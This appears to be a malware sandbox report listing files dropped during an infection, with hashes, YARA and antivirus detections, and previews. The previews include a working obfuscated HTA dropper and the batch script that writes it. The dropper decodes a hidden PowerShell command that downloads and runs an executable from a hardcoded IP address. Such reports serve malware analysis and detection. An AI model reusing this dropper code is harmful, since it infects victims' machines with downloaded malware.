                                                                                                                                                                                                                        C:\Temp\random.hta

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\random.hta, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eXbhgU9.exe.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):1058
                                                                                                                                                                                                                        Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                        MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                        SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                        SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                        SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\am[1].bat

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2798
                                                                                                                                                                                                                        Entropy (8bit):5.074542988652506
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:EouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:/u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                        MD5:D04672865C486B6AAD427C322064B30C
                                                                                                                                                                                                                        SHA1:23D3FD4C112365992E7D3E5E2A49B4C247C8A01D
                                                                                                                                                                                                                        SHA-256:BE97D5A0761863C214285693B8CE1938DF0FAD4AD4D2BDAB3667495EBCA2E826
                                                                                                                                                                                                                        SHA-512:28E6C968763EBEE2450ADDDEE9FA2A464C3499F7C9D6DE110C0CAB6F026A038BBA1A467D9842B9CA9FF92B726B760EE2D8758BF4C0B53D52F309A3AFAB7D3D09
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%64%%65%%6e%

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2013088
                                                                                                                                                                                                                        Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                        MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                        SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                        SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                        SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50688
                                                                                                                                                                                                                        Entropy (8bit):5.493299313766064
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:5tVM5LJ25oHc0C+2TkA0fjmExIBbcN3EUrr:5t0J21mj6bcN3EUrr
                                                                                                                                                                                                                        MD5:18C31E671DEA37E27E89CA09A83B73D5
                                                                                                                                                                                                                        SHA1:31A7920C83DC371AFEE48098093E5BEDD4017290
                                                                                                                                                                                                                        SHA-256:2269441328D08D17CBBA18F7AEFE172128700D428AF38D209F3D1FE8D3FCBC3E
                                                                                                                                                                                                                        SHA-512:C6400F2FBD60B7E2DD8F5ADAF08347DD21487B7DB9B10EAC09AB2A7135789E2D36C3F63BFD117DA773B968EE8AB31226AEFCC944B5F59458760BF76D358CE676
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Author: Joe Security
                                                                                                                                                                                                                        • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Author: ditekSHen
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.rg..............0.............j.... ........@.. ....................... ............`.....................................O.......$............................................................................ ............... ..H............text...p.... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B................L.......H........h...m...........................................................0..8.......s<.....(....}......}......}.....|......(...+.|....(....*.0..................s]..........sa..........se...(7...&(.....(.......(.....(.....(....-.r...p+.r...p.(.....(.....(......(.........Q...%.r...p.%..(.....%.r...p.%..(.....%.r)..p.%..(.....%.r3..p.%..(.....%.r=..p.%....(.....%..rG..p.%....(.....%..rQ..p.%..~....(.....%..r[..p.%..~....(.....(......~......(....(........re..p(........9.......rm.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1704448
                                                                                                                                                                                                                        Entropy (8bit):7.939378112820287
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:ACLkDxtWk5WtTj/JuiLWbUT5B+xLNNXTjbT+:RLkDxwk63/JVLqMS1fy
                                                                                                                                                                                                                        MD5:27998D2440B5A856ECA1795EABB8FA23
                                                                                                                                                                                                                        SHA1:62D063990224278662EBD3E54742C09C0ED74751
                                                                                                                                                                                                                        SHA-256:BB98AC0C1EF756EEE54726001008F52B498DD3C8575E190083674F52F33F3D9F
                                                                                                                                                                                                                        SHA-512:814EAB7721F0C0FDE983BF3956094847A1ED79E422AD8A6559A4A4266C9178D996B5341BE6CB20C2E62446001F89222E2D1F7AD7656EB793307AD9087B57A9BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M...,}..,}..,}..q~..,}..T..,}..,|..,}..qt..,}..q...,}.Rich.,}.........PE..L.....f.................`...........pC......p....@...........................C......>....@.................................a...u................................................................................................................... . .........@..................@....rsrc................P..............@....idata .............R..............@... . )..........T..............@...xuvnqsmj......)......V..............@...dkjxiybl.....`C.....................@....taggant.0...pC.."..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):93696
                                                                                                                                                                                                                        Entropy (8bit):6.742682621521483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfEwb3BOp:77DhdC6kzWypvaQ0FxyNTBfEB
                                                                                                                                                                                                                        MD5:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                        SHA1:F19B8F64D6B6538F9E91F0DD5B67EDD39225B811
                                                                                                                                                                                                                        SHA-256:35EA0526EF247A229B7A5FFA6D23928FD25C4BCAAC41A34D7C735CC2A8746822
                                                                                                                                                                                                                        SHA-512:3E3BE988610BE6A6874176145969AD7C0C9E7935774803A62E594BFA4C96B2BAD795E3C77EA6958AA5E38F5B5545CF9629E74D909AA5E00FCA7F78A2013F68EC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....V...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc................^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15360
